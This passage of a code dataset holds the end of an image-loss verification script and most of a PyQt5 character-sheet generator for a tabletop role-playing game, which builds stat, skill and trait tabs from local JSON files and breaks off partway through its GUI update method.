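# NOTE: B_err/G_err/R_err hold the per-channel mean absolute error between the resized\r\n    # style image and each predicted frame, i.e. np.mean(np.abs(img[:, :, c] - img2[:, :, c]))\r\n    # for channel c; Total_err is the MAE over all three channels at once, and Train_err is\r\n    # the Lrec column read from the training-loss CSV above.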
df.to_csv(r'../src/ver_losses/' + file_target + '.csv',index=False)\r\n# img3 = (img-img2)\r\n\r\n# print(np.mean(img3))\r\n\r\n","repo_name":"thanaphon0737/pytorch-vita-apply-text-replacement","sub_path":"verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9995374469","text":"\r\n\r\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer\r\nfrom PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,\r\n QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,\r\n QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,\r\n QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,\r\n QVBoxLayout, QWidget)\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtCore import *\r\nfrom tkinter import * \r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\nimport json\r\nimport os\r\nimport math\r\nimport numpy as np\r\n\r\ndef get_json(path):\r\n with open(path, \"r\") as json_file:\r\n data = json.load(json_file)\r\n return data\r\n \r\ninfo = get_json(\"./info.json\")\r\ncharTemplate = get_json(\"./character-sheet.json\")\r\n \r\nclass mainWindow(QDialog):\r\n def __init__(self, parent=None):\r\n super(mainWindow, self).__init__(parent)\r\n \r\n self.setFixedSize(600,400)\r\n mainLayout= QHBoxLayout()\r\n # mainLayout.setStretch(400,400)\r\n \r\n menuWidget = QWidget()\r\n \r\n menuLayout = QVBoxLayout()\r\n menuWidget.setLayout(menuLayout)\r\n menuLayout.addStretch()\r\n \r\n newCharButton = QPushButton(\"Create New\")\r\n newCharButton.clicked.connect(self.createNew)\r\n menuLayout.addWidget(newCharButton)\r\n \r\n loadCharButton = QPushButton(\"Load\")\r\n self.charWindow = characterWindow()\r\n loadCharButton.clicked.connect(self.load)\r\n menuLayout.addWidget(loadCharButton)\r\n \r\n exitButton = QPushButton(\"Quit\")\r\n exitButton.clicked.connect(self.exitProgram)\r\n menuLayout.addWidget(exitButton)\r\n menuLayout.addStretch()\r\n \r\n self.backgroundImage = QLabel()\r\n pixmap = QPixmap(\"./bin/background_image.jpg\")\r\n self.backgroundImage.setPixmap(pixmap)\r\n self.setStyleSheet(\"QDialog{background-image: url(bin/background_image.jpg)}\")\r\n \r\n mainLayout.addStretch()\r\n mainLayout.addWidget(menuWidget)\r\n mainLayout.addStretch()\r\n self.setLayout(mainLayout)\r\n self.setWindowTitle(\"Abril Theia Character Generator\")\r\n \r\n \r\n def createNew(self):\r\n self.nameDialog = enterNameWindow()\r\n \r\n def load(self):\r\n self.charWindow.onOpen()\r\n # self.charWindow.show()\r\n \r\n def exitProgram(self):\r\n self.close()\r\n \r\n \r\nclass singleLineEdit(QTextEdit):\r\n def keyPressEvent(self,event):\r\n if event.key() in (Qt.Key_Return,Qt.Key_Enter):\r\n return\r\n super().keyPressEvent(event)\r\n \r\nclass enterNameWindow(QDialog):\r\n def __init__(self,parent=None):\r\n super(enterNameWindow, self).__init__(parent)\r\n \r\n self.setWindowTitle(\"Enter file name\")\r\n nameLayout = QVBoxLayout()\r\n self.setnametext = QLabel()\r\n self.setnametext.setText(\"Enter your character name here \\n(This can be changed later)\")\r\n self.setLayout(nameLayout)\r\n self.nameEntryBox = QLineEdit(\"\")\r\n nameLayout.addWidget(self.setnametext)\r\n nameLayout.addWidget(self.nameEntryBox)\r\n \r\n okButton = QPushButton(\"OK\")\r\n okButton.clicked.connect(self.onClickOK)\r\n nameLayout.addWidget(okButton)\r\n 
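# NOTE: onClickOK() below writes the entered name into the loaded character-sheet template\r\n        # and dumps it to ./characters/<name>.json; an empty name creates no file. The dialog\r\n        # closes in either case.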
self.show()\r\n \r\n def onClickOK(self):\r\n name = self.nameEntryBox.text()\r\n if name != \"\":\r\n charTemplate[\"character\"] = name\r\n jsonName = \".\".join([name,\"json\"])\r\n fileRoute = \"\".join([\"./characters/\",jsonName])\r\n # ADD: If character exists - ask if wanting to overwrite \r\n with open(fileRoute, \"w+\") as file:\r\n json.dump(charTemplate,file,indent=4,sort_keys=True)\r\n print(\"File created at: \",jsonName)\r\n else:\r\n pass\r\n self.close()\r\n \r\nclass raceBox(QComboBox):\r\n def __init__(self):\r\n super(raceBox,self).__init__()\r\n for race in info[\"races\"]:\r\n self.addItem(info[\"races\"][race][\"raceName\"])\r\n \r\nclass heritageBox(QComboBox):\r\n def __init__(self):\r\n super(heritageBox,self).__init__()\r\n \r\nclass characterWindow(QDialog):\r\n def __init__(self, parent=None):\r\n super(characterWindow, self).__init__(parent) \r\n self.file = None\r\n self.fileName = None\r\n self.changed_list=[]\r\n self.imagePath = \"\"\r\n self.starting = True\r\n GridLayout = QGridLayout()\r\n \r\n #### TABS\r\n \r\n self.tabs = QTabWidget()\r\n self.chartab = QWidget()\r\n chartabLayout = QGridLayout()\r\n \r\n self.skilltab = QWidget()\r\n skilltabLayout = QGridLayout()\r\n \r\n self.combattab = QWidget()\r\n combattabLayout = QGridLayout()\r\n \r\n self.traitstab = QWidget()\r\n traitstabLayout = QGridLayout()\r\n \r\n self.invtab = QWidget()\r\n invtabLayout = QGridLayout()\r\n \r\n self.tabs.addTab(self.chartab,\"Character\")\r\n self.tabs.addTab(self.skilltab, \"Skills\")\r\n self.tabs.addTab(self.combattab, \"Combat\")\r\n self.tabs.addTab(self.traitstab, \"Traits\")\r\n self.tabs.addTab(self.invtab, \"Inventory\")\r\n \r\n #### CHARACTER TAB WIDGETS\r\n \r\n nameLayout = QHBoxLayout()\r\n nameContainer = QWidget()\r\n nameContainer.setLayout(nameLayout)\r\n \r\n self.nameText = QLabel(\"Name:\")\r\n self.nameBox = singleLineEdit()\r\n self.nameBox.setFixedHeight(25)\r\n self.nameBox.setText(\"Name\")\r\n nameLayout.addWidget(self.nameText)\r\n nameLayout.addWidget(self.nameBox)\r\n # nameLayout.addStretch()\r\n \r\n attrsContainer = QWidget()\r\n attrsLayout = QGridLayout()\r\n attrsContainer.setLayout(attrsLayout)\r\n \r\n self.attrsLabels = []\r\n self.attrsMinLabels = []\r\n self.attrsMaxLabels = []\r\n self.attrsManual = []\r\n self.attrsTraits = []\r\n self.attrsTotals = []\r\n self.attrsBonus = []\r\n \r\n attrs = [\"Strength\",\"Dexterity\",\"Constitution\",\"Intelligence\",\"Wisdom\",\"Charisma\"]\r\n for index,attr in enumerate(attrs):\r\n self.attrsLabels.append(QLabel(attr))\r\n attrsLayout.addWidget(self.attrsLabels[index],index+1,0,1,1)\r\n self.attrsMinLabels.append(QLabel())\r\n attrsLayout.addWidget(self.attrsMinLabels[index],index+1,1,1,1)\r\n self.attrsMaxLabels.append(QLabel())\r\n attrsLayout.addWidget(self.attrsMaxLabels[index],index+1,2,1,1)\r\n self.attrsManual.append(QSpinBox())\r\n self.attrsManual[index].setFixedSize(40,25)\r\n self.attrsManual[index].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n attrsLayout.addWidget(self.attrsManual[index],index+1,3,1,1)\r\n self.attrsTraits.append(QLabel(\"0\"))\r\n attrsLayout.addWidget(self.attrsTraits[index],index+1,4,1,1)\r\n self.attrsTotals.append(QLabel(\"0\"))\r\n attrsLayout.addWidget(self.attrsTotals[index],index+1,5,1,1)\r\n self.attrsBonus.append(QLabel())\r\n attrsLayout.addWidget(self.attrsBonus[index],index+1,6,1,1)\r\n # self.attrsOthers.append(QLabel())\r\n # attrsLayout.addWidget(self.attrsOthers[index],index+1,4,1,1)\r\n \r\n 
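# NOTE: header row for the attribute grid - per stat the columns are the racial Min/Max,\r\n        # a manual point-buy spinner (column 3, unlabeled), the summed trait modifiers, the\r\n        # Total, and the Bonus derived as floor((total - 10) / 2) by getMainStatModif().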
attrsLayout.addWidget(QLabel(\"Stat\"),0,0,1,1)\r\n attrsLayout.addWidget(QLabel(\"Min\"),0,1,1,1)\r\n attrsLayout.addWidget(QLabel(\"Max\"),0,2,1,1)\r\n attrsLayout.addWidget(QLabel(\"Traits\"),0,4,1,1)\r\n attrsLayout.addWidget(QLabel(\"Total\"),0,5,1,1)\r\n attrsLayout.addWidget(QLabel(\"Bonus\"),0,6,1,1)\r\n \r\n self.ptsSpent = QLabel(\"Points Spent: \")\r\n self.ptsSpent.setAlignment(Qt.AlignCenter)\r\n attrsLayout.addWidget(self.ptsSpent,7,0,1,6)\r\n \r\n \r\n raceLayout = QHBoxLayout()\r\n raceContainer = QWidget()\r\n raceContainer.setLayout(raceLayout)\r\n self.raceText = QLabel(\"Race:\")\r\n self.raceListBox = raceBox()\r\n self.raceListBox.activated.connect(lambda: self.update_file(show_update=False))\r\n self.raceInfoButton = QPushButton(\"Info\")\r\n self.raceInfoButton.setFixedWidth(50)\r\n self.raceInfoButton.clicked.connect(self.genRaceInfoWindow)\r\n raceLayout.addWidget(self.raceText)\r\n raceLayout.addWidget(self.raceListBox)\r\n raceLayout.addWidget(self.raceInfoButton)\r\n \r\n heritageLayout = QHBoxLayout()\r\n heritageContainer = QWidget()\r\n heritageContainer.setLayout(heritageLayout)\r\n self.heritageText = QLabel(\"Heritage:\")\r\n self.heritageListBox = heritageBox()\r\n self.heritageListBox.activated.connect(lambda: self.update_file(show_update=False))\r\n self.heritageInfoButton = QPushButton(\"Info\")\r\n self.heritageInfoButton.setFixedWidth(50)\r\n self.heritageInfoButton.clicked.connect(self.genHeritageInfoWindow)\r\n heritageLayout.addWidget(self.heritageText)\r\n heritageLayout.addWidget(self.heritageListBox)\r\n heritageLayout.addWidget(self.heritageInfoButton)\r\n \r\n imageLayout = QVBoxLayout()\r\n imageContainer = QWidget()\r\n imageContainer.setLayout(imageLayout)\r\n self.charImage = QLabel()\r\n imageContainer.setFixedHeight(300)\r\n imageContainer.setFixedWidth(300)\r\n self.imageButton = QPushButton(\"Choose image\")\r\n self.imageButton.clicked.connect(self.setImagePath)\r\n \r\n imageLayout.addWidget(self.charImage)\r\n imageLayout.addWidget(self.imageButton)\r\n imageLayout.addStretch()\r\n \r\n #### RP stats\r\n \r\n rpStatsLayout = QGridLayout()\r\n rpStatsContainer = QWidget()\r\n rpStatsContainer.setLayout(rpStatsLayout)\r\n self.ageLabel = QLabel(\"Age:\")\r\n self.ageBox = QSpinBox()\r\n # self.ageBox.valueChanged.connect(lambda: self.update_file(show_update=False))\r\n self.heightLabel = QLabel(\"Height:\")\r\n self.heightBox = singleLineEdit()\r\n # self.heightBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.weightLabel = QLabel(\"Weight:\")\r\n self.weightBox = singleLineEdit()\r\n # self.weightBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.eyeLabel = QLabel(\"Eye Colour:\")\r\n self.eyeBox = singleLineEdit()\r\n # self.eyeBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.skinLabel = QLabel(\"Skin Colour:\")\r\n self.skinBox = singleLineEdit()\r\n # self.skinBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n self.hairLabel = QLabel(\"Hair Colour:\")\r\n self.hairBox = singleLineEdit()\r\n # self.hairBox.textChanged.connect(lambda: self.update_file(show_update=False))\r\n for box in [self.heightBox,self.weightBox,self.eyeBox,self.skinBox,self.hairBox]:\r\n box.setFixedWidth(75)\r\n box.setFixedHeight(25)\r\n \r\n rpStatsLayout.addWidget(self.ageLabel,0,0,1,1)\r\n rpStatsLayout.addWidget(self.ageBox,0,1,1,1)\r\n rpStatsLayout.addWidget(self.heightLabel,0,2,1,1)\r\n rpStatsLayout.addWidget(self.heightBox,0,3,1,1)\r\n 
rpStatsLayout.addWidget(self.weightLabel,1,0,1,1)\r\n rpStatsLayout.addWidget(self.weightBox,1,1,1,1)\r\n rpStatsLayout.addWidget(self.eyeLabel,1,2,1,1)\r\n rpStatsLayout.addWidget(self.eyeBox,1,3,1,1)\r\n rpStatsLayout.addWidget(self.skinLabel,2,0,1,1)\r\n rpStatsLayout.addWidget(self.skinBox,2,1,1,1)\r\n rpStatsLayout.addWidget(self.hairLabel,2,2,1,1)\r\n rpStatsLayout.addWidget(self.hairBox,2,3,1,1)\r\n \r\n rpLayout = QGridLayout()\r\n rpContainer = QWidget()\r\n rpContainer.setLayout(rpLayout)\r\n self.backgroundLabel = QLabel(\"Background:\")\r\n self.backgroundBox = QTextEdit()\r\n rpLayout.addWidget(self.backgroundLabel,0,0,1,1)\r\n rpLayout.addWidget(self.backgroundBox,1,0,1,1)\r\n \r\n notesLayout = QVBoxLayout()\r\n notesContainer = QWidget()\r\n notesContainer.setLayout(notesLayout)\r\n self.notesLabel = QLabel(\"Notes:\")\r\n self.notesBox = QTextEdit()\r\n notesLayout.addWidget(self.notesLabel)\r\n notesLayout.addWidget(self.notesBox)\r\n \r\n \r\n #### SKILLS TAB WIDGETS\r\n \r\n self.skillsLayout = QGridLayout()\r\n skillsWidget = QWidget()\r\n skillsWidget.setLayout(self.skillsLayout)\r\n \r\n headers = [\"Skill\",\"Ability Modifier\",\"Ability Bonus\", \"Proficiency\", \"Other modifiers\",\"Temp\",\"Total Skill Bonus\",\"Quick Roll\"]\r\n for index in range(0,len(headers)):\r\n headerWidget = QLabel(headers[index])\r\n headerWidget.setAlignment(Qt.AlignHCenter)\r\n self.skillsLayout.addWidget(headerWidget,0,index,1,1)\r\n \r\n self.skillsNameWidgets = []\r\n self.skillsStatsWidgets = []\r\n self.skillsModifsWidgets = []\r\n self.skillsProfsWidgets = []\r\n self.skillsManualWidgets = []\r\n self.skillsTempWidgets = []\r\n self.skillsTotalWidgets = []\r\n self.skillsRollWidgets = []\r\n for j,i in enumerate(info[\"skills\"]):\r\n self.skillsNameWidgets.append(QLabel(info[\"skills\"][i][\"name\"]))\r\n self.skillsLayout.addWidget(self.skillsNameWidgets[j],j+1,0,1,1)\r\n self.skillsStatsWidgets.append(QLabel(parseStat(info[\"skills\"][i][\"stat\"])))\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n self.skillsModifsWidgets.append(QLabel(\"0\"))\r\n self.skillsModifsWidgets[j].setAlignment(Qt.AlignHCenter)\r\n self.skillsLayout.addWidget(self.skillsModifsWidgets[j],j+1,2,1,1)\r\n profCheckBox = QCheckBox()\r\n profCheckBox.setTristate(True)\r\n self.skillsProfsWidgets.append(profCheckBox)\r\n self.skillsLayout.addWidget(self.skillsProfsWidgets[j],j+1,3,1,1)\r\n self.skillsManualWidgets.append(QSpinBox())\r\n self.skillsManualWidgets[j].setRange(-10,10)\r\n self.skillsManualWidgets[j].setFixedWidth(40)\r\n self.skillsManualWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsLayout.addWidget(self.skillsManualWidgets[j],j+1,4,1,1)\r\n self.skillsTempWidgets.append(QSpinBox())\r\n self.skillsTempWidgets[j].setRange(-10,10)\r\n self.skillsTempWidgets[j].setFixedWidth(40)\r\n self.skillsTempWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsLayout.addWidget(self.skillsTempWidgets[j],j+1,5,1,1)\r\n self.skillsTotalWidgets.append(QLabel())\r\n self.skillsTotalWidgets[j].setAlignment(Qt.AlignCenter)\r\n self.skillsTotalWidgets[j].setStyleSheet(\"font-weight: bold\")\r\n self.skillsLayout.addWidget(self.skillsTotalWidgets[j],j+1,6,1,1)\r\n self.skillsRollWidgets.append(rollWidget(self,file=self.file,skill=i,index=j))\r\n self.skillsLayout.addWidget(self.skillsRollWidgets[j],j+1,7,1,1)\r\n \r\n traitsMainLayout = QHBoxLayout()\r\n self.traitsLeftLayoutContainer = QWidget()\r\n self.traitsRightLayoutContainer = QWidget()\r\n self.traitsLeftLayout = 
QVBoxLayout()\r\n self.traitsRightLayout = QVBoxLayout()\r\n self.traitsLeftLayoutContainer.setLayout(self.traitsLeftLayout)\r\n self.traitsRightLayoutContainer.setLayout(self.traitsRightLayout)\r\n self.traitsOwnedTabs = QTabWidget()\r\n self.traitsOwnedMartialTab = QScrollArea()\r\n self.traitsOwnedLeymancyTab = QScrollArea()\r\n self.traitsOwnedProfessionTab = QScrollArea()\r\n self.traitsOwnedSubtletyTab = QScrollArea()\r\n \r\n self.traitsOwnedTabs.addTab(self.traitsOwnedLeymancyTab,\"Leymancy (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedMartialTab,\"Martial (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedProfessionTab,\"Profession (0)\")\r\n self.traitsOwnedTabs.addTab(self.traitsOwnedSubtletyTab,\"Subtlety (0)\")\r\n self.traitsLeftLayout.addWidget(self.traitsOwnedTabs)\r\n \r\n self.traitsInfoTabs = QTabWidget()\r\n self.traitsInfoMartialTab = QScrollArea()\r\n self.traitsInfoMartialTab.setSizePolicy(QSizePolicy(QSizePolicy.Expanding,QSizePolicy.Expanding))\r\n self.traitsInfoLeymancyTab = QScrollArea()\r\n self.traitsInfoProfessionTab = QScrollArea()\r\n self.traitsInfoSubtletyTab = QScrollArea()\r\n \r\n self.traitsInfoMartialTabLayout = QVBoxLayout()\r\n self.traitsInfoLeymancyTabLayout = QVBoxLayout()\r\n self.traitsInfoProfessionTabLayout = QVBoxLayout()\r\n self.traitsInfoSubtletyTabLayout = QVBoxLayout()\r\n \r\n self.martialTabContainer = QWidget()\r\n self.leymancyTabContainer = QWidget()\r\n self.professionTabContainer = QWidget()\r\n self.subtletyTabContainer = QWidget()\r\n \r\n self.martialTabContainer.setLayout(self.traitsInfoMartialTabLayout)\r\n self.leymancyTabContainer.setLayout(self.traitsInfoLeymancyTabLayout)\r\n self.professionTabContainer.setLayout(self.traitsInfoProfessionTabLayout)\r\n self.subtletyTabContainer.setLayout(self.traitsInfoSubtletyTabLayout)\r\n \r\n \r\n self.traitsInfoMartialTab.setWidget(self.martialTabContainer)\r\n self.traitsInfoLeymancyTab.setWidget(self.leymancyTabContainer)\r\n self.traitsInfoProfessionTab.setWidget(self.professionTabContainer)\r\n self.traitsInfoSubtletyTab.setWidget(self.subtletyTabContainer)\r\n \r\n \r\n \r\n \r\n self.traitsInfoTabs.addTab(self.traitsInfoLeymancyTab,\"Leymancy\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoMartialTab,\"Martial\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoProfessionTab,\"Profession\")\r\n self.traitsInfoTabs.addTab(self.traitsInfoSubtletyTab,\"Subtlety\")\r\n self.traitsRightLayout.addWidget(self.traitsInfoTabs)\r\n \r\n self.traitsLeftLowerContainer = QWidget()\r\n self.traitsLeftLowerLayout = QVBoxLayout()\r\n self.traitsLeftLowerContainer.setLayout(self.traitsLeftLowerLayout)\r\n self.traitsLeftDelButton = QPushButton(\"Remove Trait\")\r\n self.traitsLeftLowerLayout.addWidget(self.traitsLeftDelButton)\r\n self.traitsLeftLowerLabel = QLabel(\" \")\r\n self.traitsLeftLowerLayout.addWidget(self.traitsLeftLowerLabel)\r\n \r\n self.traitsRightLowerContainer = QWidget()\r\n self.traitsRightLowerLayout = QVBoxLayout()\r\n self.traitsRightLowerContainer.setLayout(self.traitsRightLowerLayout)\r\n self.traitsRightAddButton = QPushButton(\"Add Trait\")\r\n self.traitsRightLowerLayout.addWidget(self.traitsRightAddButton)\r\n self.traitsRightLowerLabel = QLabel(\" \")\r\n self.traitsRightLowerLayout.addWidget(self.traitsRightLowerLabel)\r\n \r\n self.traitsRightLayout.addWidget(self.traitsRightLowerContainer)\r\n self.traitsLeftLayout.addWidget(self.traitsLeftLowerContainer)\r\n \r\n traitsMainLayout.addWidget(self.traitsLeftLayoutContainer)\r\n 
traitsMainLayout.addWidget(self.traitsRightLayoutContainer)\r\n \r\n skilltabLayout.addWidget(skillsWidget,0,0,1,1)\r\n \r\n #### COMBAT TAB WIDGETS\r\n \r\n \r\n #### TRAITS TAB WIDGETS\r\n \r\n updateButton = QPushButton()\r\n updateButton.setText(\"Update File\")\r\n updateButton.setFixedWidth(100)\r\n updateButton.clicked.connect(lambda: self.update_file(show_update=True))\r\n \r\n ####\r\n \r\n chartabLayout.addWidget(nameContainer,0,0,1,1)\r\n chartabLayout.addWidget(attrsContainer,1,0,1,1)\r\n chartabLayout.addWidget(raceContainer,2,0,1,1)\r\n chartabLayout.addWidget(heritageContainer,3,0,1,1)\r\n chartabLayout.addWidget(imageContainer,0,1,7,1)\r\n chartabLayout.addWidget(rpStatsContainer,4,0,1,1)\r\n chartabLayout.addWidget(rpContainer,5,0,4,1)\r\n chartabLayout.addWidget(notesContainer,7,1,1,1)\r\n GridLayout.addWidget(self.tabs)\r\n GridLayout.addWidget(updateButton,1,0,1,3)\r\n self.setLayout(GridLayout)\r\n self.chartab.setLayout(chartabLayout)\r\n self.skilltab.setLayout(skilltabLayout)\r\n self.traitstab.setLayout(traitsMainLayout)\r\n \r\n \r\n \r\n def onOpen(self):\r\n self.fileName = self.browseFile(ftypes = [(\"json Files\",\"*.json\")],directory=\"./characters/\")\r\n if len(self.fileName) > 0:\r\n print(\"File\",self.fileName,\"successfully loaded.\")\r\n self.changed_list = []\r\n self.starting = True\r\n self.update_gui()\r\n self.update_file(show_update=False)\r\n self.update_gui()\r\n self.show()\r\n else:\r\n print(\"File not loaded.\")\r\n \r\n def setImagePath(self):\r\n imagePath = self.browseFile(ftypes = [(\"image Files\",\"*.jpg *.png *.bmp\")],directory=\"./images/\")\r\n if imagePath: \r\n self.imagePath = imagePath\r\n self.update_file(show_update=False)\r\n else:\r\n pass\r\n \r\n def browseFile(self, ftypes,directory):\r\n currDir = os.getcwd()\r\n return filedialog.askopenfilename(filetypes = ftypes,initialdir = directory)\r\n \r\n \r\n def genRaceInfoWindow(self):\r\n self.raceInfoWindow = showRaceInfoWindow(file=self.file)\r\n self.raceInfoWindow.show()\r\n \r\n def genHeritageInfoWindow(self):\r\n self.heritageInfoWindow = showHeritageInfoWindow(file=self.file)\r\n self.heritageInfoWindow.show()\r\n \r\n def update_gui(self):\r\n if self.fileName == None:\r\n print(\"No file loaded\")\r\n pass\r\n else:\r\n if self.file == None:\r\n self.file = get_json(self.fileName) \r\n \r\n self.setWindowTitle(self.file[\"character\"])#\r\n \r\n ### Widgets\r\n \r\n self.nameBox.setPlainText(self.file[\"character\"])\r\n \r\n raceIndex = self.raceListBox.findText(self.file[\"race\"])\r\n self.raceListBox.setCurrentIndex(raceIndex)\r\n heritage = self.file[\"heritage\"]\r\n self.heritageList = []\r\n for i in info[\"races\"][self.file[\"race\"]][\"heritages\"]:\r\n self.heritageList.append(i)\r\n if self.heritageListBox.currentText() in self.heritageList:\r\n pass\r\n else:\r\n self.heritageListBox.clear()\r\n for j in self.heritageList:\r\n self.heritageListBox.addItem(j)\r\n heritageIndex = self.heritageListBox.findText(self.file[\"heritage\"])\r\n self.heritageListBox.setCurrentIndex(heritageIndex)\r\n \r\n age = int(self.file[\"rp_attributes\"][\"age\"])\r\n self.ageBox.setValue(age)\r\n \r\n pixmap = QPixmap(self.file[\"rp_attributes\"][\"image\"])\r\n self.charImage.setPixmap(pixmap)\r\n if self.imagePath == \"\":\r\n self.imagePath = self.file[\"rp_attributes\"][\"image\"]\r\n \r\n height = self.file[\"rp_attributes\"][\"height\"]\r\n self.heightBox.setText(height)\r\n weight = self.file[\"rp_attributes\"][\"weight\"]\r\n self.weightBox.setText(weight)\r\n 
eyes = self.file[\"rp_attributes\"][\"eyes\"]\r\n self.eyeBox.setText(eyes)\r\n skin = self.file[\"rp_attributes\"][\"skin\"]\r\n self.skinBox.setText(skin)\r\n hair = self.file[\"rp_attributes\"][\"hair\"]\r\n self.hairBox.setText(hair)\r\n \r\n for j in range(0,len(self.skillsNameWidgets)):\r\n # Name widgets\r\n skill = self.skillsNameWidgets[j].text()\r\n if self.starting:\r\n if info[\"skills\"][skill][\"stat\"] == \"STAT:ANY\":\r\n # Add a selection of stat to add\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n elif info[\"skills\"][skill][\"stat\"] == \"STAT:PHYSICAL\":\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any Physical\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n elif info[\"skills\"][skill][\"stat\"] == \"STAT:MENTAL\":\r\n self.skillsLayout.removeWidget(self.skillsStatsWidgets[j])\r\n self.skillsStatsWidgets[j].setParent(None)\r\n self.skillsStatsWidgets[j] = statSelectBox(stats = \"Any Mental\")\r\n self.skillsLayout.addWidget(self.skillsStatsWidgets[j],j+1,1,1,1)\r\n \r\n try:\r\n self.skillsStatsWidgets[j].setCurrentIndex(self.skillsStatsWidgets[j].getIndex(self.file[\"skills\"][skill][\"stat\"]))\r\n except:\r\n self.skillsStatsWidgets[j].setText(parseStat(self.file[\"skills\"][skill][\"stat\"]))\r\n \r\n statName = self.skillsStatsWidgets[j].text()\r\n for stat,statDict in info[\"modifiers\"].items():\r\n if statDict[\"name\"] == statName:\r\n statModif = getMainStatModif(self.file[\"stats\"][stat])\r\n self.skillsModifsWidgets[j].setText(str(statModif))\r\n \r\n proficiency = int(self.file[\"skills\"][skill][\"proficiency\"])\r\n if self.starting:\r\n self.skillsProfsWidgets[j].setCheckState(proficiency)\r\n self.skillsProfsWidgets[j].stateChanged.connect(lambda: self.update_file(show_update=False))\r\n self.skillsProfsWidgets[j].setText(parseProficiency(proficiency))\r\n proficiencyModifier = int(self.file[\"stats\"][\"STAT:PROF\"])\r\n proficiencyBonus = proficiency * proficiencyModifier\r\n \r\n manualVal = int(self.file[\"skills\"][skill][\"manual\"])\r\n if self.starting:\r\n self.skillsManualWidgets[j].setValue(manualVal)\r\n self.skillsManualWidgets[j].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n \r\n tempVal = self.skillsTempWidgets[j].value()\r\n if self.starting:\r\n self.skillsTempWidgets[j].valueChanged.connect(lambda: self.update_file(show_update=False))\r\n \r\n total = proficiencyBonus + manualVal + tempVal + int(statModif)\r\n self.skillsTotalWidgets[j].setText(str(total))\r\n \r\n \r\n modifs = []\r\n for category in self.file[\"traits\"]:\r\n for trait in self.file[\"traits\"][category]:\r\n if len(info[\"traits\"][category][trait][\"modifiers\"]) > 0: \r\n modifs.append(info[\"traits\"][category][trait][\"modifiers\"])\r\n for ability in info[\"races\"][self.file[\"race\"]][\"abilities\"]:\r\n if len(info[\"races\"][self.file[\"race\"]][\"abilities\"][ability]) > 0:\r\n modifs.append(info[\"races\"][self.file[\"race\"]][\"abilities\"][ability][\"modifiers\"])\r\n try:\r\n if len(info[\"races\"][self.file[\"race\"]][\"heritages\"][self.file[\"heritage\"]][\"modifiers\"]) > 0:\r\n 
modifs.append(info[\"races\"][self.file[\"race\"]][\"heritages\"][self.file[\"heritage\"]][\"modifiers\"])\r\n except:\r\n pass\r\n modifsDict = genModifsDict(modifs)\r\n # If there are any other things that give modifiers, add here!\r\n \r\n \r\n manualStatsTotals = 0\r\n for j in range(0,len(self.attrsLabels)):\r\n attr = self.attrsLabels[j].text()\r\n attrString = deParseStat(attr)\r\n race = self.file[\"race\"]\r\n minVal = info[\"races\"][race][\"startingStats\"][j]\r\n maxVal = info[\"races\"][race][\"maxStats\"][j]\r\n self.attrsMinLabels[j].setText(str(minVal))\r\n self.attrsMaxLabels[j].setText(str(maxVal))\r\n try:\r\n traits_val = modifsDict[attrString]\r\n except:\r\n traits_val = 0\r\n self.attrsTraits[j].setText(str(traits_val))\r\n if self.starting:\r\n self.attrsTraits[j].setAlignment(Qt.AlignCenter)\r\n \r\n total = self.file[\"stats\"][attrString]\r\n manualVal = total - minVal - traits_val\r\n self.attrsTotals[j].setText(str(total))\r\n self.attrsTotals[j].setAlignment(Qt.AlignCenter)\r\n self.attrsManual[j].setValue(manualVal)\r\n manualStatsTotals += manualVal\r\n \r\n \r\n \r\n else:\r\n manual = int(self.attrsManual[j].value())\r\n manualStatsTotals += manual\r\n total = minVal + manual + traits_val\r\n \r\n self.attrsTotals[j].setText(str(total))\r\n self.attrsTotals[j].setAlignment(Qt.AlignCenter)\r\n \r\n if total > maxVal:\r\n self.attrsTotals[j].setStyleSheet(\"QLabel {color:red}\")\r\n else:\r\n self.attrsTotals[j].setStyleSheet(\"QLabel {color:white}\")\r\n self.attrsBonus[j].setText(\"(%+d\" %getMainStatModif(int(self.attrsTotals[j].text()))+\")\")\r\n \r\n self.ptsSpent.setText(\"Points Spent: %i\" %manualStatsTotals)\r\n \r\n # populate traits list\r\n \r\n # if starting: populate traits explorer\r\n \r\n if self.starting:\r\n self.traitsInfoWidgets = []\r\n for category,layout in [[\"leymancy\",self.traitsInfoLeymancyTabLayout],[\"martial\",self.traitsInfoMartialTabLayout,],[\"profession\",self.traitsInfoProfessionTabLayout],[\"subtlety\",self.traitsInfoSubtletyTabLayout]]:\r\n traits = info[\"traits\"][category]\r\n for trait in traits.keys():\r\n traitWidget = traitContainer(self,category=category,trait=trait)\r\n # traitWidget.clicked.connect(self.update_gui())\r\n self.traitsInfoWidgets.append(traitWidget)\r\n 